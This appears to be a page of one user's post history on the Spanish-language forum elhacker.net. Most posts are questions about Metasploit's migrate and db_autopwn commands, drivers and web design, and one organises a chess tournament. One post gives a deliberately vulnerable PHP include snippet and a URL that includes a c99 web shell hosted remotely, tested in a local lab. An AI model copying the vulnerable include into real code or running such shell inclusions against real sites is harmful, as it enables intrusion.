elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: 1 [2] 3 4
11  Seguridad Informática / Bugs y Exploits / Migrate en metasploit en: 3 Enero 2012, 00:08 am
Buenas, como dice el titulo, quiero entender bien como funciona el migrate o sea al parecer por lo que lei lo que hace es infectar otros procesos que estan corriendo en la maquina victima.
Lo que no entiendo es el porque de esto, se me ocurrio que puede servir para algunas de estas dos cuestiones.

1-esconder el proceso del metasploit.
2-si la victima reinicia la pc, seguir teniendo un backdoor para volver a entrar.

en caso de que sea para la opcion 2, como puedo volver a entrar por ese backdoor que infecte en otro proceso?

Desde ya muchas gracias.
12  Seguridad Informática / Bugs y Exploits / Problema con metasploit. en: 21 Diciembre 2011, 18:12 pm
Buenas, tengo la siguiente situacion, me instale en mi pc el VMware y instale el sistema operativo windows XP service pack 2 como sistema operativo de la maquina virtual, en mi maquina real tengo instalado windows 7 home.

Luego realize un escaneo de vulnerabilidades con nessus, y detecto algo asi como 98 vulnerabildiades en ese windows xp.

Bueno fui a mi consola de metasploit y cargue el reporte del nessus.
Reconocio algo asi como 51 vulnerabilidades.
Hasta ahi todo impecable el problema surge al momento de usar el comando autopwn -x -e , aparece el siguiente mensaje:

msf > db_autopwn -x -e
[-]
[-] Warning: The db_autopwn command is deprecated and will be removed in a future version.
[-]          This code is not well maintained, crashes systems, and crashes itself.
[-]

msf >

Y aparece para escribir nuevamente sin exhibir ningun tipo de resultado, cual puede ser el motivo de esto?

Muchas gracias, desde ya!
13  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Problema con W395 en: 31 Diciembre 2010, 16:29 pm
Buenas gente, les comento mi problema, resulta que el cel se me mojo, prende a la perfeccion pero la pantalla quedo negra..

El cel enciende hasta de memoria pude poner musica, las teclas tmb tiene las luces etc, pero la pantalla siempre negra, ya pasaron como 3 dias de esto, y sigue sin prender..

Mi pregunta es si seguir esperando, cual puede ser el problema?

Saludos y gracias.
14  Informática / Hardware / Ayuda driver en: 26 Julio 2010, 03:14 am
Necesito ayuda para conseguir el driver de video para una hp 530 en la que tengo windows 7.

El model de tarjeta es el siguiente : Mobile Intel(R) 945 Express Chipset Family.


No los puedo encontrar por ningun lado, cualquier ayuda muchas gracias.
15  Programación / Desarrollo Web / Duda con WAMP y permisos. en: 22 Julio 2010, 06:11 am
La cuestion es que tengo el wamp 5.0 y necesito cambiarle a una carpeta los permisos, como estoy en windows lei por ahi que solo alcanzaria con sacar el tilde a "solo lectura" que aparece en las propiedades, el inconveniente es que cuando lo saco doy aplicar, si vuelvo a entrar a las propiedades, este aparece marcado nuevamente :S

Que puedo hacer?

Gracias.
16  Programación / Desarrollo Web / Duda con estilos. en: 22 Julio 2010, 01:14 am
Que seria lo mas correcto a la hora de acomodar una web en la que utilizo muchos <div>, seria mas recomendable acomodarlos por porcentajes o cantidad de pixeles?
Cuales serian las desventajas o ventajas?

Supongo que los pixeles pueden tener problemas con los cambios de resolucion..

Alguna recomendacion?


Gracias.
17  Seguridad Informática / Nivel Web / Duda con RFI en: 20 Julio 2010, 01:56 am
Buenas, tome un ejemplo de un codigo vulnerable de la wiki de elhacker.net.

Este codigo que voy a poner a continuacion, lo tengo en un wamp, es decir me instale un servidor local para hacer la prueba.

El index.html seria el siguiente:

Código:
<HTML>
<HEAD>
<TITLE> Prueva de RFI </TITLE>
</HEAD>
<BODY>
 
<A HREF="rfi.php?cont=hola.html">Hola!</A>
<BR><BR>
<A HREF="rfi.php?cont=adios.html">Adios!</A>
 
</BODY>
</HTML>

El rfi.php seria el siguiente:

Código:
<?php
 
$var = $_GET["cont"];
include($var);
 
?>

Ahora bien, me cree una cuenta en un servidor gratuito, para ser mas especifico en este : 000webhost.com

Y subi una shell(c99) con extension en txt.

Ahora bien, verifique efectivamente que la web esta sea vulnerable de al siguiente manera : http://localhost/rfi.php?cont=http://google.com , efectivamente abre google.

Ahora, si pruebo hacer lo siguiente :

http://localhost/rfi.php?cont=http://mipagina/shell.txt

Me dan los siguientes errores y no entiendo el motivo.


Warning: include(http://mipagina.com/shell.txt) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in C:\wamp\www\rfi.php on line 4

Warning: include() [function.include]: Failed opening 'http://mipagina.com/shell.txt' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\rfi.php on line 4

Alguien entiendo cual es el problema? o si estoy haciendo algo mal?

Saludos y gracias.


18  Foros Generales / Dudas Generales / Duda con internet. en: 19 Julio 2010, 09:00 am
Debe ser algo obvio lo que voy a preguntar pero por mas que busque no logre encontrar la respuesta.

La cuestion es que me cruze con una pagina a la cual se puede entrar solamente poniendo http://pagina.com , pero sin embargo si pones www.pagina.com no entra.

No entiendo el motivo de esto..

Incluso si pongo http://www.pagina.com tampoco entra.

Alguien me lo puede explicar?

Gracias.
19  Sistemas Operativos / Windows / Duda con driver para windows en: 28 Junio 2010, 00:19 am
La cuestion es esta, tengo una camara web media vieja, una labtec modelo 5.1 y el problema es que el driver que trae la camara web en el cd soporta solo hasta windows XP, y yo tengo el 7, hay alguna forma de hacerla funcionar de todas formas?
Busqe el driver de la camara para windows 7 y no encontre nada...

Alguien me puede ayudar?

Saludos y gracias.
20  Foros Generales / Sugerencias y dudas sobre el Foro / Propongo algo. en: 21 Febrero 2009, 02:37 am
No se si alguien ya lo habra pensando, pero se me ocurrio la posibilidad de realizar un campeonato de ajedrez, para eso podriamos utilizar una pagina www.ludoteka.com

Todos los usuarios del foro que quieran participar se podrian anotar aca, yo hago el sorteo armo el fixture, y jugamos ronda clasificatoria y luego eliminatoria

Hoy estamos a 21, habria tiempo hasta el 24 para anotarse.. y luego lo jugamos.. los contricantes a jguar podrian por pm organizar dia y hora de su partido, y jugarlo cuando ambos puedan, una ves terminado el partido el ganador postea el screen, y lsito se le acredita el partido como ganando en caso de olvidarse de sacar el screen el usuario que perdio deberia tener la honradez de venir aca y decir que ah perdido.

No se que les parece.. a mi me gusta la idea.

Lista de usuarios anotados para participar. (quiero llegar a unos 20).

1 - Nasarid15
2 - José#
3 - Carloswaldo
4 - Hadess_inf
5 - Sempus
6 - Blink182
7 - BadDevil
8 - Chungakotorodunga Chunga Chunga
9 - Bht Sata
10 - Dr. John
11 - B.O.P.E
12 - Danfelbm
13 - hitori
14 - Darioxhcx
15 - Sk9ITk5Z
16 - WHK
17 - Castiblanco
18 - Littlehorse
19 - Dante Alighieri
20 - TheMaker

FIXTURE

Grupo 1.
Hadess_inf
B.O.P.E
BadDevil
Sk9ITk5Z

PARTIDOS POR EL GRUPO 1.

Hadess_inf vs B.O.P.E
Hadess_inf vs BadDevil
Hadess_inf vs Sk9ITk5Z
B.O.P.E vs BadDevil
B.O.P.E vs Sk9ITk5Z
BadDevil vs Sk9ITk5Z

Grupo 2.
hitori
Darioxhcx
Nasarid15
Blink182

PARTIDOS POR EL GRUPO 2.

hitori vs Darioxhcx
hitori vs Nasarid15
hitori vs Blink182
Darioxhcx vs Nasarid15
Darioxhcx vs Blink182
Nasarid15 vs Blink182

Grupo 3.
Chungakotorodunga Chunga Chunga
Danfelbm
WHK
Sempus

PARTIDOS POR EL GRUPO 3.

Chungakotorodunga Chunga Chunga vs Danfelbm
Chungakotorodunga Chunga Chunga vs WHK
Chungakotorodunga Chunga Chunga vs Sempus
Danfelbm vs WHK
Danfelbm vs Sempus
WHK vs Sempus


Grupo 4.
Carloswaldo
Dr. John
Bht Sata
José#

PARTIDOS POR EL GRUPO 4.

Carloswaldo vs Dr. John
Carloswaldo vs Bht Sata
Carloswaldo vs José#
Dr. John vs Bht Sata
Dr. John vs José#
Bht Sata vs José#


Grupo 5.
Castiblanco
Littlehorse
Dante Alighieri
TheMaker

PARTIDOS POR EL GRUPO 5.

Castiblanco vs Littlehorse
Castiblanco vs Dante Alighieri
Castiblanco vs TheMaker
Littlehorse vs Dante Alighieri
Littlehorse vs TheMaker
Dante Alighieri vs TheMaker

Los resultados de los encuentros los voy a ir poniendo aca mismo, recuerden, tablas 1 punto partido ganado 3, la primer ronda es clasificatoria de los 2 mejores y luego eliminatoria.

Hoy mismo pueden arrancar los partidos, en la proxima semana tiene que estar terminada la primer ronda, arregluen los partidos por privados, los usuarios que no se presenten deberan ser sustituidos, o en caso contrario definitivamente eliminados.

Recordemos que el tiempo el color de las fichas, es selecionado por los usuarios a jugar en el momento.

Mucha suerte a todos.

Saludos.
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines